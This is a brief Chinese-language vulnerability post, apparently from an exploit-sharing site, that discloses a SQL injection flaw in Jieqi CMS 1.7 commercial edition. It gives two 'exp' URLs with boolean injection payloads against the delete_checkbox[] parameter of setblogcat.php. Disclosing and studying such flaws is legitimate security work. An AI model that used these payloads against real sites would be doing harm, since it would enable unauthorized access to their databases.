杰奇CMS 1.7商业版注入漏洞

杰奇CMS 1.7商业版用了Zend加密,批量解密后,发现程序员用了几个函数,使得这套系统基本没了注入漏洞。在判断ip时,程序员将.过滤再判断是否是为数字,值得借鉴。

exp:
http://0day5.com/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=1%23

http://0day5.com/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=2%23

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录